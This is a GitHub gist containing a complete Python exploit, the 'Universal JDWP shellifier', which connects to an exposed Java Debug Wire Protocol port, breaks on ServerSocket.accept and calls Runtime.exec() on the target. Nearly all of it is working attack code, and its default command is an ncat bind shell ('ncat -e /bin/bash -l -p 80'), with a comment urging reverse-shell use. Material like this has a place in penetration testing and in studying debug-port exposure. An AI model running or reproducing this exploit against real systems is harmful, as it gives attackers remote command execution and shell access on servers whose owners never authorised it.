Skip to content

Instantly share code, notes, and snippets.

@hugsy
Created December 9, 2013 07:54
Show Gist options
  • Save hugsy/7868799 to your computer and use it in GitHub Desktop.
Save hugsy/7868799 to your computer and use it in GitHub Desktop.
Standalone script to execute a command on any open JDWP service
##############################################################
#
# Universal JDWP shellifier
#
# References
# * http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
# * http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
#
# Note: this script DOES NOT read the output of the command executed on the backend.
# You should only use it to create a reverse shell.
#
import socket
import time
import sys
import struct
import urllib
# +-------------------------------------------------+
# | Settings: adjust these to match the target.     |
# +-------------------------------------------------+
RHOST = "localhost" # IP address or FQDN of the target JDWP service
RPORT = 8000 # TCP port the target JDWP service listens on
CMD = "ncat -e /bin/bash -l -p 80" # command handed to Runtime.exec() on the target (see runtime_exec); its output is not read back
BREAK_ON_CLASS = "Ljava/net/ServerSocket;" # type signature ("L...;" form, matched case-insensitively) of the class whose method gets a breakpoint (default is fine)
BREAK_ON_METHOD = "accept" # name of the method to break on; the command only runs once some target thread calls it (default is fine)
################################################################################
#
# JDWP protocol variables
#
# Values mirror the JDWP protocol specification. Command "signatures" are
# (command set, command) pairs used by JDWPClient.create_packet().
HANDSHAKE = "JDWP-Handshake"
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80

# VirtualMachine command set (1)
VERSION_SIG = (1, 1)
CLASSESBYSIGNATURE_SIG = (1, 2)
ALLCLASSES_SIG = (1, 3)
ALLTHREADS_SIG = (1, 4)
IDSIZES_SIG = (1, 7)
CREATESTRING_SIG = (1, 11)
SUSPENDVM_SIG = (1, 8)
RESUMEVM_SIG = (1, 9)

# ReferenceType command set (2)
SIGNATURE_SIG = (2, 1)
FIELDS_SIG = (2, 4)
METHODS_SIG = (2, 5)
GETVALUES_SIG = (2, 6)
CLASSOBJECT_SIG = (2, 11)

# ClassType command set (3)
INVOKESTATICMETHOD_SIG = (3, 3)

# ObjectReference command set (9)
REFERENCETYPE_SIG = (9, 1)
INVOKEMETHOD_SIG = (9, 6)

# StringReference command set (10)
STRINGVALUE_SIG = (10, 1)

# ThreadReference command set (11)
THREADNAME_SIG = (11, 1)
THREADSUSPEND_SIG = (11, 2)
THREADRESUME_SIG = (11, 3)
THREADSTATUS_SIG = (11, 4)

# EventRequest command set (15)
EVENTSET_SIG = (15, 1)
EVENTCLEAR_SIG = (15, 2)
EVENTCLEARALL_SIG = (15, 3)

# EventRequest.Set modifier kinds
MODKIND_COUNT = 1
MODKIND_THREADONLY = 3  # spec value; 2 is the Conditional modifier
MODKIND_CLASSMATCH = 5
MODKIND_LOCATIONONLY = 7

# Event kinds and suspend policies
EVENT_BREAKPOINT = 2
SUSPEND_EVENTTHREAD = 1
SUSPEND_ALL = 2

# Error codes
NOT_IMPLEMENTED = 99
VM_DEAD = 112

# Invoke options (bit flags): 0x01 single-threaded, 0x02 is INVOKE_NONVIRTUAL
INVOKE_SINGLE_THREADED = 0x01

# Value tag / type tag
TAG_OBJECT = 76  # 'L'
TYPE_CLASS = 1
################################################################################
#
# JDWP client class
#
class JDWPClient(object):
    """Minimal client for the Java Debug Wire Protocol (JDWP).

    Talks JDWP over a plain TCP socket; packets are encoded and decoded by
    hand with ``struct`` using big-endian fields. Class, method, field and
    thread lookups are cached on the instance after the first request.

    The VM's ID sizes (objectIDSize, methodIDSize, ...) are learned by
    idsizes(), so most methods require start() to have run first.
    """

    def __init__(self):
        self.methods = {}   # cache: refTypeId -> list of method entries
        self.fields = {}    # cache: refTypeId -> list of field entries
        self.id = 0x01      # id stamped on the next outgoing command packet
        self.socket = None  # connected socket, set by handshake()

    def create_packet(self, cmdsig, data=b""):
        """Encode a JDWP command packet.

        cmdsig: (command set, command) pair, e.g. VERSION_SIG.
        data:   already-encoded payload appended after the 11-byte header.
        Returns the packet bytes. Each call consumes a new packet id.
        """
        flags = 0x00
        cmdset, cmd = cmdsig
        pktlen = len(data) + 11
        # header: length(4) id(4) flags(1) command set(1) command(1)
        pkt = struct.pack(">IIBBB", pktlen, self.id, flags, cmdset, cmd)
        pkt += data
        self.id += 2
        return pkt

    def _recv_exact(self, size, sock=None):
        """Read exactly ``size`` bytes from ``sock`` (default: self.socket).

        Raises Exception if the peer closes the connection first; a blocking
        recv() returning nothing means EOF, so retrying would loop forever.
        """
        if sock is None:
            sock = self.socket
        chunks = []
        remaining = size
        while remaining > 0:
            chunk = sock.recv(remaining)
            if not chunk:
                raise Exception("connection closed by remote end")
            chunks.append(chunk)
            remaining -= len(chunk)
        return b"".join(chunks)

    def read_reply(self):
        """Read one JDWP packet and return its payload (header stripped).

        Used both for replies and for command packets the VM sends on its own
        (events). Raises Exception if a reply carries a non-zero error code;
        the payload is consumed first so the stream stays packet-aligned.
        """
        header = self._recv_exact(11)
        pktlen, _pkt_id, flags, errcode = struct.unpack(">IIBH", header)
        # Read exactly this packet's body so the next packet is not consumed.
        buf = self._recv_exact(pktlen - 11)
        # For command packets the last two header bytes are command set and
        # command, not an error code, so only check replies.
        if flags == REPLY_PACKET_TYPE and errcode:
            raise Exception("Received errcode %d" % errcode)
        return buf

    def parse_entries(self, buf, formats, explicit=True):
        """Decode a sequence of records from a reply payload.

        formats lists (fmt, name) pairs describing one record:
          "L" or 8 -> 8-byte unsigned int    "I" or 4 -> 4-byte unsigned int
          "S"      -> length-prefixed string, returned as raw bytes
          "C"      -> 1-byte unsigned int
          "Z"      -> tagged value; only tag 's' (String object id, resolved
                      with solve_string) and tag 'I' (int, read unsigned)
        With explicit=True the payload starts with a 4-byte record count;
        otherwise exactly one record is decoded.

        Returns a list of dicts mapping name -> decoded value.
        Raises Exception on an unknown format or unsupported value tag.
        """
        entries = []
        if explicit:
            nb_entries = struct.unpack(">I", buf[:4])[0]
            buf = buf[4:]
        else:
            nb_entries = 1
        for _ in range(nb_entries):
            data = {}
            for fmt, name in formats:
                if fmt == "L" or fmt == 8:
                    data[name] = int(struct.unpack(">Q", buf[:8])[0])
                    buf = buf[8:]
                elif fmt == "I" or fmt == 4:
                    data[name] = int(struct.unpack(">I", buf[:4])[0])
                    buf = buf[4:]
                elif fmt == "S":
                    length = struct.unpack(">I", buf[:4])[0]
                    data[name] = buf[4:4 + length]
                    buf = buf[4 + length:]
                elif fmt == "C":
                    data[name] = struct.unpack(">B", buf[:1])[0]
                    buf = buf[1:]
                elif fmt == "Z":
                    tag = struct.unpack(">B", buf[:1])[0]
                    if tag == 115:  # 's': String object id
                        size = self.objectIDSize
                        data[name] = self.solve_string(buf[1:1 + size])
                        buf = buf[1 + size:]
                    elif tag == 73:  # 'I': int
                        data[name] = struct.unpack(">I", buf[1:5])[0]
                        buf = buf[5:]
                    else:
                        raise Exception("Unsupported value tag %d" % tag)
                else:
                    raise Exception("Unknown format")
            entries.append(data)
        return entries

    def format(self, fmt, value):
        """Encode an integer as an 8-byte ("L"/8) or 4-byte ("I"/4) big-endian field."""
        if fmt == "L" or fmt == 8:
            return struct.pack(">Q", value)
        elif fmt == "I" or fmt == 4:
            return struct.pack(">I", value)
        else:
            raise Exception("Unknown format")

    def unformat(self, fmt, value):
        """Decode the leading 8-byte ("L"/8) or 4-byte ("I"/4) big-endian integer of value."""
        if fmt == "L" or fmt == 8:
            return struct.unpack(">Q", value[:8])[0]
        elif fmt == "I" or fmt == 4:
            return struct.unpack(">I", value[:4])[0]
        else:
            raise Exception("Unknown format")

    def start(self, host, port):
        """Connect, then fetch ID sizes, VM version and the loaded-class list."""
        self.handshake(host, port)
        self.idsizes()
        self.getversion()
        self.allclasses()
        # self.allthreads() # not used, faster

    def handshake(self, host, port):
        """Connect to host:port and exchange the HANDSHAKE string.

        On success the socket is stored in self.socket. On any failure the
        socket is closed and an exception is raised.
        """
        s = socket.socket()
        try:
            s.connect((host, port))
            s.sendall(HANDSHAKE)
            reply = self._recv_exact(len(HANDSHAKE), s)
        except Exception:
            s.close()
            raise
        if reply != HANDSHAKE:
            s.close()
            raise Exception("failed to handshake")
        self.socket = s
        return

    def leave(self):
        """Close the connection if one is open; safe to call more than once."""
        if getattr(self, "socket", None) is not None:
            self.socket.close()
            self.socket = None
        return

    def getversion(self):
        """Query VirtualMachine.Version and store each reply field as an attribute."""
        self.socket.sendall(self.create_packet(VERSION_SIG))
        buf = self.read_reply()
        formats = [("S", "description"), ("I", "jdwpMajor"), ("I", "jdwpMinor"),
                   ("S", "vmVersion"), ("S", "vmName")]
        for entry in self.parse_entries(buf, formats, False):
            for name, value in entry.items():
                setattr(self, name, value)
        return

    @property
    def version(self):
        """Return "vmName - vmVersion" (requires getversion() to have run)."""
        return "%s - %s" % (self.vmName, self.vmVersion)

    def idsizes(self):
        """Query VirtualMachine.IDSizes and store each size as an attribute."""
        self.socket.sendall(self.create_packet(IDSIZES_SIG))
        buf = self.read_reply()
        formats = [("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"),
                   ("I", "referenceTypeIDSize"), ("I", "frameIDSize")]
        for entry in self.parse_entries(buf, formats, False):
            for name, value in entry.items():
                setattr(self, name, value)
        return

    def allthreads(self):
        """Return (and cache) all threads as a list of {"threadId": id} dicts."""
        if getattr(self, "threads", None) is None:
            self.socket.sendall(self.create_packet(ALLTHREADS_SIG))
            buf = self.read_reply()
            formats = [(self.objectIDSize, "threadId")]
            self.threads = self.parse_entries(buf, formats)
        return self.threads

    def get_thread_by_name(self, name):
        """Return the first thread entry whose name equals name, else None."""
        self.allthreads()
        for t in self.threads:
            threadId = self.format(self.objectIDSize, t["threadId"])
            self.socket.sendall(self.create_packet(THREADNAME_SIG, data=threadId))
            buf = self.read_reply()
            if buf and name == self.readstring(buf):
                return t
        return None

    def allclasses(self):
        """Return (and cache) every loaded class as a dict.

        Each dict has the keys refTypeTag, refTypeId, signature and status.
        """
        if getattr(self, "classes", None) is None:
            self.socket.sendall(self.create_packet(ALLCLASSES_SIG))
            buf = self.read_reply()
            formats = [("C", "refTypeTag"),
                       (self.referenceTypeIDSize, "refTypeId"),
                       ("S", "signature"),
                       ("I", "status")]
            self.classes = self.parse_entries(buf, formats)
        return self.classes

    def get_class_by_name(self, name):
        """Return the class entry whose signature matches name (case-insensitive), else None."""
        for entry in self.allclasses():
            if entry["signature"].lower() == name.lower():
                return entry
        return None

    def get_methods(self, refTypeId):
        """Return (and cache) the methods declared by refTypeId.

        Each method is a dict with the keys methodId, name, signature and modBits.
        """
        if refTypeId not in self.methods:
            refId = self.format(self.referenceTypeIDSize, refTypeId)
            self.socket.sendall(self.create_packet(METHODS_SIG, data=refId))
            buf = self.read_reply()
            formats = [(self.methodIDSize, "methodId"),
                       ("S", "name"),
                       ("S", "signature"),
                       ("I", "modBits")]
            self.methods[refTypeId] = self.parse_entries(buf, formats)
        return self.methods[refTypeId]

    def get_method_by_name(self, name):
        """Return the first cached method named name (case-insensitive), else None.

        Searches every class loaded through get_methods(); overloads and
        same-named methods in different classes are not distinguished.
        """
        for methods in self.methods.values():
            for entry in methods:
                if entry["name"].lower() == name.lower():
                    return entry
        return None

    def getfields(self, refTypeId):
        """Return (and cache) the fields declared by refTypeId.

        Each field is a dict with the keys fieldId, name, signature and modbits.
        """
        if refTypeId not in self.fields:
            refId = self.format(self.referenceTypeIDSize, refTypeId)
            self.socket.sendall(self.create_packet(FIELDS_SIG, data=refId))
            buf = self.read_reply()
            formats = [(self.fieldIDSize, "fieldId"),
                       ("S", "name"),
                       ("S", "signature"),
                       ("I", "modbits")]
            self.fields[refTypeId] = self.parse_entries(buf, formats)
        return self.fields[refTypeId]

    def getvalue(self, refTypeId, fieldId):
        """Read one static field value; returns a {"value": ...} dict."""
        data = self.format(self.referenceTypeIDSize, refTypeId)
        data += struct.pack(">I", 1)  # number of fields requested
        data += self.format(self.fieldIDSize, fieldId)
        self.socket.sendall(self.create_packet(GETVALUES_SIG, data=data))
        buf = self.read_reply()
        formats = [("Z", "value")]
        field = self.parse_entries(buf, formats)[0]
        return field

    def createstring(self, data):
        """Allocate a string in the VM; returns [{"objId": id}]."""
        buf = self.buildstring(data)
        self.socket.sendall(self.create_packet(CREATESTRING_SIG, data=buf))
        buf = self.read_reply()
        return self.parse_entries(buf, [(self.objectIDSize, "objId")], False)

    def buildstring(self, data):
        """Encode data as a length-prefixed string (4-byte big-endian length + bytes)."""
        return struct.pack(">I", len(data)) + data

    def readstring(self, data):
        """Decode a length-prefixed string from the start of data."""
        size = struct.unpack(">I", data[:4])[0]
        return data[4:4 + size]

    def suspendvm(self):
        """Suspend every thread in the VM."""
        self.socket.sendall(self.create_packet(SUSPENDVM_SIG))
        self.read_reply()
        return

    def resumevm(self):
        """Resume every thread in the VM."""
        self.socket.sendall(self.create_packet(RESUMEVM_SIG))
        self.read_reply()
        return

    def invokestatic(self, classId, threadId, methId, objId=None, *args):
        """Invoke a static method in threadId; returns the raw reply payload.

        args are pre-encoded tagged values. objId is unused and kept only for
        signature compatibility. NOTE: because objId precedes *args, a fourth
        positional argument binds to objId and is NOT sent. Pass an explicit
        objId (e.g. None) before any method arguments.
        """
        data = self.format(self.referenceTypeIDSize, classId)
        data += self.format(self.objectIDSize, threadId)
        data += self.format(self.methodIDSize, methId)
        data += struct.pack(">I", len(args))
        for arg in args:
            data += arg
        data += struct.pack(">I", 0)  # invoke options: none
        self.socket.sendall(self.create_packet(INVOKESTATICMETHOD_SIG, data=data))
        buf = self.read_reply()
        return buf

    def invoke(self, objId, threadId, classId, methId, *args):
        """Invoke an instance method on objId in threadId; returns the raw reply payload.

        args are pre-encoded tagged values.
        """
        data = self.format(self.objectIDSize, objId)
        data += self.format(self.objectIDSize, threadId)
        data += self.format(self.referenceTypeIDSize, classId)
        data += self.format(self.methodIDSize, methId)
        data += struct.pack(">I", len(args))
        for arg in args:
            data += arg
        data += struct.pack(">I", 0)  # invoke options: none
        self.socket.sendall(self.create_packet(INVOKEMETHOD_SIG, data=data))
        buf = self.read_reply()
        return buf

    def solve_string(self, objId):
        """Return the contents of the String object whose encoded id is objId ("" if empty reply)."""
        self.socket.sendall(self.create_packet(STRINGVALUE_SIG, data=objId))
        buf = self.read_reply()
        if buf:
            return self.readstring(buf)
        else:
            return ""

    def query_thread(self, threadId, kind):
        """Send a ThreadReference command for threadId; the reply payload is discarded."""
        data = self.format(self.objectIDSize, threadId)
        self.socket.sendall(self.create_packet(kind, data=data))
        self.read_reply()
        return

    def suspend_thread(self, threadId):
        return self.query_thread(threadId, THREADSUSPEND_SIG)

    def status_thread(self, threadId):
        # NOTE(review): the status reply is discarded by query_thread.
        return self.query_thread(threadId, THREADSTATUS_SIG)

    def resume_thread(self, threadId):
        return self.query_thread(threadId, THREADRESUME_SIG)

    def send_event(self, eventCode, *args):
        """Register an event request that suspends all threads; returns its request id.

        args are (modKind, encoded modifier payload) pairs.
        """
        data = struct.pack(">BBI", eventCode, SUSPEND_ALL, len(args))
        for kind, option in args:
            data += struct.pack(">B", kind) + option
        self.socket.sendall(self.create_packet(EVENTSET_SIG, data=data))
        buf = self.read_reply()
        return struct.unpack(">I", buf)[0]

    def clear_event(self, eventCode, rId):
        """Cancel the event request rId of kind eventCode."""
        data = struct.pack(">BI", eventCode, rId)
        self.socket.sendall(self.create_packet(EVENTCLEAR_SIG, data=data))
        self.read_reply()
        return

    def clear_events(self):
        """Send EVENTCLEARALL_SIG to clear all breakpoint requests."""
        self.socket.sendall(self.create_packet(EVENTCLEARALL_SIG))
        self.read_reply()
        return

    def wait_for_event(self):
        """Block until the next packet arrives and return its payload."""
        buf = self.read_reply()
        return buf

    def parse_event_breakpoint(self, buf, eventId):
        """Extract (requestId, threadId, -1) from an event payload, or None.

        Offsets assume the layout suspendPolicy(1) eventCount(4), then for the
        first event kind(1) requestId(4) thread(objectIDSize). Returns None
        when the first event's request id is not eventId. The location is
        not decoded.
        """
        rId = struct.unpack(">I", buf[6:10])[0]
        if rId != eventId:
            return None
        tId = self.unformat(self.objectIDSize, buf[10:10 + self.objectIDSize])
        loc = -1  # don't care
        return rId, tId, loc
def _find_method(methods, name):
    """Return the first entry in methods whose name matches name (case-insensitive), else None."""
    wanted = name.lower()
    for entry in methods:
        if entry["name"].lower() == wanted:
            return entry
    return None


def runtime_exec(cli, cmd):
    """Execute cmd on the target VM through Runtime.getRuntime().exec().

    cli must be a started JDWPClient. The steps are:
      1. allocate cmd as a string in the VM;
      2. look up Runtime and getRuntime();
      3. set a breakpoint on BREAK_ON_CLASS.BREAK_ON_METHOD;
      4. resume the VM and wait for that breakpoint;
      5. use the suspended thread to invoke getRuntime() and then exec(cmd).
    Method lookups are restricted to the class they belong to. The command's
    output is not read.

    Returns True when exec() returned an object reference, False when a
    lookup or invocation does not produce what is expected. Protocol errors
    propagate as exceptions raised by cli.
    """
    print("[+] Reading settings for '%s'" % cli.version)

    # 1. allocating string containing our command to exec()
    cmdObjIds = cli.createstring(cmd)
    if len(cmdObjIds) == 0:
        print("[-] failed to allocate command")
        return False
    cmdObjId = cmdObjIds[0]["objId"]
    print("[+] command string object created id:%x" % cmdObjId)

    # 2. get Runtime class reference
    clazz = cli.get_class_by_name("Ljava/lang/Runtime;")
    if clazz is None:
        print("[-] cannot find class Runtime")
        return False
    print("[+] found Runtime class: id=%x" % clazz["refTypeId"])

    # 3. get getRuntime() meth reference, searching Runtime's own methods only
    runtime_methods = cli.get_methods(clazz["refTypeId"])
    meth = _find_method(runtime_methods, "getRuntime")
    if meth is None:
        print("[-] cannot find method getRuntime")
        return False
    print("[+] found getRuntime: id=%x" % meth["methodId"])

    # 4. setup breakpoint on frequently called method
    c = cli.get_class_by_name(BREAK_ON_CLASS)
    if c is None:
        print("[-] cannot find class %s" % BREAK_ON_CLASS)
        return False
    # Search only BREAK_ON_CLASS's methods so a same-named Runtime method
    # cannot be paired with this class id.
    m = _find_method(cli.get_methods(c["refTypeId"]), BREAK_ON_METHOD)
    if m is None:
        print("[-] cannot find method %s" % BREAK_ON_METHOD)
        return False
    # location: type tag, class id, method id, 8-byte code index 0
    loc = chr(TYPE_CLASS)
    loc += cli.format(cli.referenceTypeIDSize, c["refTypeId"])
    loc += cli.format(cli.methodIDSize, m["methodId"])
    loc += struct.pack(">II", 0, 0)
    data = [(MODKIND_LOCATIONONLY, loc), ]
    rId = cli.send_event(EVENT_BREAKPOINT, *data)
    print("[+] created break event id=%x" % rId)

    # 5. resume vm and wait for event
    cli.resumevm()
    print("[+] waiting for a matching event")
    while True:
        buf = cli.wait_for_event()
        ret = cli.parse_event_breakpoint(buf, rId)
        if ret is not None:
            break
    rId, tId, loc = ret
    print("[+] received matching event from thread %#x" % tId)

    # 6. use context to get Runtime object
    buf = cli.invokestatic(clazz["refTypeId"], tId, meth["methodId"])
    # Clear the breakpoint request on both the success and failure paths.
    cli.clear_event(EVENT_BREAKPOINT, rId)
    if buf[0] != chr(TAG_OBJECT):
        print("[-] Unexpected returned type")
        return False
    rt = cli.unformat(cli.objectIDSize, buf[1:1 + cli.objectIDSize])
    print("[+] got runtime context id:%#x" % rt)

    # 7. find exec() method (first overload named exec in Runtime)
    meth = _find_method(runtime_methods, "exec")
    if meth is None:
        print("[-] cannot find method exec")
        return False
    print("[+] found exec: id=%x" % meth["methodId"])

    # 8. call exec() in this context with the alloc-ed string
    data = [chr(TAG_OBJECT) + cli.format(cli.objectIDSize, cmdObjId)]
    buf = cli.invoke(rt, tId, clazz["refTypeId"], meth["methodId"], *data)
    if buf[0] != chr(TAG_OBJECT):
        print("[-] Unexpected returned type")
        return False
    print("[+] Invoking exec() successful, retId=%x" % cli.unformat(cli.objectIDSize, buf[1:1 + cli.objectIDSize]))
    cli.resumevm()
    print("[+] Command successfully executed")
    return True
if __name__ == "__main__":
    # Entry point: connect, run the command, exit 0 on success and 1 on failure.
    retcode = 0
    cli = JDWPClient()
    try:
        cli.start(RHOST, RPORT)
        if not runtime_exec(cli, CMD):
            print("[-] Exploit failed")
            retcode = 1
    except KeyboardInterrupt:
        pass
    except Exception as e:
        print("[-] Exception: %s" % e)
        retcode = 1
    finally:
        # start() can fail before any socket exists. Don't let cleanup raise
        # AttributeError and mask the real error.
        if getattr(cli, "socket", None) is not None:
            cli.leave()
    sys.exit(retcode)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment